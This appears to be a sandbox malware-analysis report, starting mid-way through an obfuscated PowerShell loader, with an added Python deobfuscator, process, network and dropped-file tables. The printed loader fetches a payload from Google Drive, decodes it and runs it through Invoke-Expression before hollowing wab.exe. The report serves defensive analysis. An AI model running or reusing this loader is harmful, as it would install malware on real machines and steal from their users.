MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb 
UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme 
tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"
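The powershell.exe command lines above are the complete first stage, and the only transformation they apply is the `gigged` function defined at their start: it keeps every eighth character of each quoted literal (index 7, 15, 23, ... while the index is below Length-1) and discards the seven filler characters before it; `Alcaldes` is `. iex`, so each decoded literal goes straight into Invoke-Expression. The Python below is an added deobfuscator, not part of the sandbox report or the sample. It ports `gigged`, decodes the literals from the command line that this copy of the page preserved intact, and replays the first statements far enough to show what the cmd.exe child is for: `cmd /c "echo %appdata%\Cystenchyme.aan && echo t"` returns the drop path as its first output line and the single letter `t` as its second, and the script appends that `t` to a deliberately truncated `...System.Net.WebClien` literal before executing it (the truncation comes from `gigged` never emitting the final index). `%APPDATA%` is taken from the dropped-file path in the Files section and passed in as a constructed environment; `fake_cmd_echo` is a stand-in that never runs cmd.exe, and `reconstruct_stage` and `decode_literals` are names chosen here. Caveat: the copy of the script on this page has line breaks inserted and some runs of spaces collapsed, so several of its other literals (the user-agent string among them) no longer decode cleanly at a straight stride of 8; the cmd literal does, and decodes to exactly the child command line recorded above, which is the check to run before trusting any decode.

```python
"""Added deobfuscator for the `gigged` string encoding used by this sample's
PowerShell stage (example code, not part of the sandbox report).

In the script, gigged($s) runs
    for ($i = 7; $i -lt $s.Length - 1; $i += 8) { emit $s[$i] }
so every eighth character of a literal is payload and the seven before it are
filler. Alcaldes(x) is `. iex x`, so each decoded string is executed directly.
"""
import re

# Literals copied verbatim from the powershell.exe command line above, keyed by
# the variable that receives them in the script. Only literals that this copy
# of the page preserved without collapsed spaces are included.
LITERALS = {
    "Krigssituationens": r" tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ",
    "Afkortersav": "UnproviiLa inioeLystyacxPrecalc ",
    "Returgodset": "SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ",
    "Flyvevaabnet": " Dutch >Ph.toet ",
    "Seducer223": "Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt",
}

GIGGED_CALL = re.compile(r"gigged\s+'([^']*)'")


def gigged(s: str, start: int = 7, stride: int = 8) -> str:
    """Port of the script's gigged: keep s[start], s[start+stride], ... while the
    index is below len(s) - 1. The last character is never emitted, which the
    script exploits to leave one literal a letter short (see reconstruct_stage)."""
    return "".join(s[i] for i in range(start, len(s) - 1, stride))


def decode_literals(script: str) -> list[str]:
    """Decode every gigged '<literal>' call found in a script fragment, in order."""
    return [gigged(lit) for lit in GIGGED_CALL.findall(script)]


def fake_cmd_echo(cmd_line: str, env: dict[str, str]) -> list[str]:
    """Offline stand-in for `cmd /c "echo ... && echo ..."`: expand %VAR% from the
    constructed env and return the lines cmd.exe would print. Never runs cmd.exe."""
    lines = []
    for part in cmd_line.split("&&"):
        part = part.strip()
        if part.startswith("echo "):
            lines.append(re.sub(r"%(\w+)%",
                                lambda m: env.get(m.group(1).upper(), m.group(0)),
                                part[5:]))
    return lines


def reconstruct_stage(env: dict[str, str]) -> dict[str, str]:
    """Replay the loader's first statements:
    $bygningsreglementernes = (cmd /c $Krigssituationens)
    $Roughhouses = $bygningsreglementernes[0]
    $Seducer223 += $bygningsreglementernes[1]; Alcaldes $Seducer223"""
    cmd_line = gigged(LITERALS["Krigssituationens"])
    output = fake_cmd_echo(cmd_line, env)               # $bygningsreglementernes
    return {
        "exec_alias": gigged(LITERALS["Afkortersav"]),   # what Alcaldes dot-sources
        "cmd_line": cmd_line,
        "drop_path": output[0],                          # $Roughhouses
        "webclient_stmt": gigged(LITERALS["Seducer223"]) + output[1],  # 'WebClien' + 't'
        "user_agent_header": gigged(LITERALS["Returgodset"]),
        "url_separator": gigged(LITERALS["Flyvevaabnet"]),
    }


if __name__ == "__main__":
    # %APPDATA% is constructed from the dropped-file path in the Files section.
    for key, value in reconstruct_stage({"APPDATA": r"C:\Users\Admin\AppData\Roaming"}).items():
        print(f"{key:18} {value}")
```

Decoded at the same stride, allowing for the collapsed spaces, the remaining literals read as the rest of a staged downloader: the WebClient gets the User-Agent header, downloads the Google Drive URL to the `.aan` path inside a Test-Path/Start-Sleep retry loop, then the file is read back, Base64-decoded to ASCII, and the substring at offset `$Horsiness` (315407) of length `$Gaullists` (29994), the two plain integers visible near the end of the command line, is handed to Invoke-Expression. The network rows (drive.google.com, drive.usercontent.google.com) and the dropped `C:\Users\Admin\AppData\Roaming\Cystenchyme.aan` in the Files section are the observable side of that sequence; the SetThreadContext row shows the 32-bit powershell.exe hollowing wab.exe afterwards.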

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | drive.google.com | udp
GB | 142.250.187.238:443 | drive.google.com | tcp
US | 8.8.8.8:53 | drive.usercontent.google.com | udp
GB | 172.217.169.33:443 | drive.usercontent.google.com | tcp
GB | 142.250.187.238:443 | drive.google.com | tcp
GB | 172.217.169.33:443 | drive.usercontent.google.com | tcp
US | 8.8.8.8:53 | api.ipify.org | udp
US | 104.26.13.205:443 | api.ipify.org | tcp
US | 8.8.8.8:53 | ip-api.com | udp
US | 208.95.112.1:80 | ip-api.com | tcp

Files

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 ba9563f04617a88e57e8c5570fafa1f6
SHA1 16ccd5c12c2e93fccb354bf4655f624748cbc1f1
SHA256 273e078cfaa142cddf150b1bfc6787fb1db78532c0ab65e1a07b28c6e939c51b
SHA512 e86be586b76800ee0439d496a8529198048d14a5d57134c9569364e4022d9639214ec9f53ba8f7ae1a0c558a65b2539d116c205e7ffb1a5dedbb9b8c0cc5965e

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 dd21f671dea68ac7cd8bf939d4eeda94
SHA1 60680c11f047dfd1f31b6121b98e8acdcc886e6b
SHA256 408a0fe12e992004153e1a9b7aac32c4e66d9b4841019fcbfb18a8674d709467
SHA512 e23eeb6927dcf233cb0159d6796c7f793a0de7169cb6ab421610f55d902aca9ab172ff905f61404a54f5d3ef2a97d99562486f9384db592cdf2113b09b4c02e7

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 453dc4b9303e5d379ce631ececb64171
SHA1 56e8d3f33a7f615a663b52d6decb6f0137668e52
SHA256 f1c454f72f9ffdb3448a33937ae1f08624a993614e083a4ef0b2e4c936176bb6
SHA512 1618026075c1ffa78280a91fdd713ea82d553bf29d07bb872db7552799d938855fd3d9090cc27497d7e8cd208f3c05b7e9134f754f330e51b63f417049c68717

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 42f4cdaff599bf751294f7772ef38470
SHA1 22d0b54450fb80f14860ffa415c5d0b2d1074a3b
SHA256 2a8488b7b6eb1ce9702c196531a0335c9b399960f5d0d3f6892f87ef6d3f743a
SHA512 45edd484ada632eba0d48a716a591d975f9ad6d414faa6a996e09f810d06a5234d2dcd28ff49e3b8e96133e815f86e681f66b66cdb648461f8ce6a53b056a74c

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 ea02db7340e3f6e6b8e17308b6557be3
SHA1 4dded0ce59ba5daea1945ed6c818139aaf87478d
SHA256 7dce804a8697a14a7a3f373b752d8c27cfae9f594620cfb5b67a362d5f227a33
SHA512 45a1658ad9fb86ca758d384a875886bee1ffa77109a71a99db4f33198d53374c75f1093549d9b55c5f6830f04657a6ff2af1519ddadff6511298acced105f683

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 a0ffdcd45250b56ef7b6ece47dfaa18f
SHA1 af5079167ca7e43f73a3a65524016e12bd10b74e
SHA256 c72d2de94bcaf6f0b0413ea1457702e325285db25a33ad9e7a6c964fedc8cf43
SHA512 40d8db37fd09f130d8defa2f904b9521cd85b5f565ecbf9639c4f54d33f2fc5c5a8aea41e30a792837da60a3c224935c704c3b9daa441d0f47a798c443a038ec

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 2ac0d2e4dc51e1a2fac93883f392047d
SHA1 4b602734b7f0e8736f1687005362013ecf6adb7f
SHA256 d8aa74f29b5249196b19533d26963b3c5720f984c789ba88fa0ea7c84d4c1191
SHA512 02b0e47673ca66dba9c531108c91c1747e788e49140b9bc0f5a90635e4c2276a75a2b2ff35ad54f0bb34220f7233f2c1606e9f6e8b0c282e14201c4536a39ba3

memory/2828-367-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

memory/2828-368-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

memory/2828-369-0x00000000025E0000-0x00000000025E8000-memory.dmp

memory/2828-370-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2828-371-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2828-372-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2828-373-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2828-374-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZOG5NM3CAAAEVL24Q1J8.temp

MD5 0f92386785a13628a4071822314c0366
SHA1 4229682fd835d285140f6419b04d525a86a1a285
SHA256 ae7af3d0069215db6c9d485bb711a90b06e5eea059573ebf8ad2b0cd4f3ad572
SHA512 ac86a52cf97c21df9ae1f116cc15380ed40a572ea60dc8979ca6d09f3b49f70fdd898ae60a3f2abe6f9815fd9060f30abd79ec788418edb76cfdf46e15511bf6

C:\Users\Admin\AppData\Roaming\Cystenchyme.aan

MD5 a6606652ec2653f860af183b8aac3058
SHA1 bb291794a1893882657aea82cd6d92582e2b2a6c
SHA256 9988a534348a5f6a8082601a2506633a7394aeb9fcb7d571c458f28f603bd3ed
SHA512 eaae2e736f6fc10cfff0a5756a287c689e62f906c3190ecf21d99702469aa2aa635ae28c42ea180d6f5e5cb64fe4d3112045fcf3bb519e31d3c80b60aaf1d824

memory/2828-380-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2828-381-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

memory/2756-382-0x00000000062A0000-0x000000000AF6E000-memory.dmp

memory/596-407-0x0000000000C80000-0x0000000000CC2000-memory.dmp

memory/596-406-0x0000000000C80000-0x0000000001CE2000-memory.dmp

memory/2828-408-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-18 09:36

Reported

2024-06-18 09:38

Platform

win10v2004-20240508-en

Max time kernel

142s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp

Files

C:\Users\Admin\AppData\Local\Temp\Elysee.txt


C:\Users\Admin\AppData\Local\Temp\Elysee.txt


memory/4408-363-0x00007FF947473000-0x00007FF947475000-memory.dmp

memory/4408-364-0x00000207433B0000-0x00000207433D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_14l3cqvn.2i1.ps1


memory/4408-374-0x00007FF947470000-0x00007FF947F31000-memory.dmp

memory/4408-375-0x00007FF947470000-0x00007FF947F31000-memory.dmp

memory/4408-376-0x00007FF947470000-0x00007FF947F31000-memory.dmp

memory/4408-377-0x00007FF947473000-0x00007FF947475000-memory.dmp

memory/4408-378-0x00007FF947470000-0x00007FF947F31000-memory.dmp

memory/4408-379-0x00007FF947470000-0x00007FF947F31000-memory.dmp